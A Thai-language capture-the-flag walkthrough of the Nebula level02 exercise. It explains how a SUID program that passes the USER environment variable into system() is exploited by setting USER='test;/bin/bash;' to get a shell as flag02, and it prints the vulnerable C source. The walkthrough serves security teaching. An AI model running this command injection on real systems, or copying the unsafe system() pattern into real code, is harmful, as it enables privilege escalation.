บทนำ (Overview)
จากบทความที่แล้วเรากล่าวถึงตัวแปร “Environmental Variables” ที่ชื่อ “PATH” ไปแล้ว แต่เราจะพบว่าจริง ๆ แล้วยังมีอีกหลายตัว แต่โดยโครงสร้างของการกำหนดตัวแปรนั้น จะมีลักษณะดังนี้
KEY=value1:value2:...
เราสามารถตรวจสอบได้โดยใช้คำสั่ง “env” หรือ “printenv” ตัวอย่างเช่น
level02@nebula:/home/flag02$ env TERM=xterm-256color SHELL=/bin/sh SSH_CLIENT=192.168.1.57 17386 22 SSH_TTY=/dev/pts/0 USER=level02 LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36: MAIL=/var/mail/level02 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games PWD=/home/flag02 LANG=en_US.UTF-8 SHLVL=1 HOME=/home/level02 LANGUAGE=en_US: LOGNAME=level02 SSH_CONNECTION=192.168.1.57 17386 192.168.1.47 22 LESSOPEN=| /usr/bin/lesspipe %s LESSCLOSE=/usr/bin/lesspipe %s %s _=/usr/bin/env OLDPWD=/home
ขั้นตอน (Steps)
- ดาวน์โหลด “VM” ได้จาก https://exploit-exercises.com/download/
- “Login” โดยใช้ “User” คือ “level02” และ “Password” คือ “level02”
- โดยวัตถุประสงค์เราจะยกระดับสิทธิจาก “level02” เป็น “flag02”
- พบโปรแกรมคือ “/home/flag02 โดยใช้คำสั่งดังนี้
ssh level02@192.168.1.47 level02@nebula:/home/flag02$ ls -l total 8 -rwsr-x--- 1 flag02 level02 7438 2011-11-20 21:22 flag02 level02@nebula:/home/flag02$ ./flag02 about to call system("/bin/echo level02 is cool") level02 is cool - จากโจทย์โปรแกรมดังกล่าวมี “Source-code” โดยให้ค้นหาว่าช่องโหว่ดังกล่าวคือ สามารถตรวจสอบรายละเอียดของโจทย์ ได้จาก https://exploit-exercises.com/nebula/level02/
int main(int argc, char **argv, char **envp) { char *buffer; gid_t gid; uid_t uid; gid = getegid(); uid = geteuid(); setresgid(gid, gid, gid); setresuid(uid, uid, uid); buffer = NULL; asprintf(&buffer, "/bin/echo %s is cool", getenv("USER")); printf("about to call system(\"%s\")\n", buffer); system(buffer); } - จากโจทย์กล่าวว่า โปรแกรมข้างต้นมีช่องโหว่ ที่จะสามารถ “Run” คำสั่งอื่น ๆ (หรือโปรแกรมต่าง ๆ) นอกเหนือจากโปรแกรมที่เขียนไว้ได้ โดยสามารถได้สิทธิตามเจ้าของไฟล์ เนื่องจากมีการตั้ง “SUID” ให้กับไฟล์ดังกล่าว สามารถติดตามได้จากบทความ How to find SUID permission – Nebula 00
- มาตรวจสอบ “Source-code” ดูจะพบว่า
asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));- ดึงข้อมูลจากตัวแปร “USER” ที่เป็น “Environmental Variables” นั้นก็คือ
USER=level02
- โดยที่ค่าอ่านจากตัวแปร “Environment Variables” จะถูกนำไปรวมกับ %s จะได้เป็นข้อความดังนี้
/bin/echo level02 is cool
- จาก “Source-code” จะพบว่ามีการสร้างตัวแปรชื่อ “buffer” ซึ่งเป็นตัวแปรประเภท pointer (8) ให้มีความสามารถจัดเก็บข้อมูลประเภท “Char” หรือตัวอักษรได้
char *buffer
- กำหนดค่าอักขระตามข้อ (2) แล้วตั้งค่า “pointer” จากตัวแปรดังกล่าวให้มีขนาดเพียงพอรองรับอักขระที่เราใส่เข้าไปโดยใช้ฟังก์ชัน
asprintf(&buffer, "char....");
- ดึงข้อมูลจากตัวแปร “USER” ที่เป็น “Environmental Variables” นั้นก็คือ
- ในส่วนสุดท้ายจะพบว่าข้อมูลในตัวแปร “buffer” จะถูกนำมาประมวลผลโดยใช้คำสั่ง “system” ซึ่งก็คือ /bin/echo
system(buffer);
- ที่นี้ลองกลับมาที่ตัวแปร “Environment Variables” ถ้าเราเปลี่ยนค่าเป็นคำสั่งอื่น ๆ จะเกิดอะไรขึ้น เราสามารถเปลี่ยนค่าในตัวแปรดังกล่าวโดยใช้คำสั่งดังนี้
/usr/bin/env USER="test;/bin/bash;" /home/flag02/flag02
- จากตัวอย่างข้างต้นเราลองเปลี่ยนตัวแปร “USER” โดยใช้คำสั่ง “/use/bin/env” โดยให้เป็นข้อความดังนี้ test;/bin/bash
TERM=xterm-256color SHELL=/bin/sh SSH_CLIENT=192.168.1.47 3289 22 SSH_TTY=/dev/pts/0 USER=test;/bin/bash; LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36: MAIL=/var/mail/level02 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games PWD=/home/flag02 LANG=en_US.UTF-8 SHLVL=1 HOME=/home/level02 LANGUAGE=en_US: LOGNAME=level02 SSH_CONNECTION=192.168.1.47 3289 192.168.1.54 22 LESSOPEN=| /usr/bin/lesspipe %s LESSCLOSE=/usr/bin/lesspipe %s %s _=/usr/bin/env OLDPWD=/home
- ผลลัพธ์จากการ “Run” คำสั่งจะเป็นดังนี้
about to call system("/bin/echo test;/bin/bash; is cool") test - โปรแกรมจะ “echo” เพื่อแสดงผลคำว่า “test” และจบสิ้นคำสั่งเมื่อพบคำสั่ง “;” จากนั้นจะทำคำสั่งต่อไปคือ “/bin/bash”
- ตรวจสอบ “id” จะพบว่าเป็น “flag02”
flag02@nebula:/home/flag02$ id uid=997(flag02) gid=1003(level02) groups=997(flag02),1003(level02) flag02@nebula:/home/flag02$ getflag You have successfully executed getflag on a target account
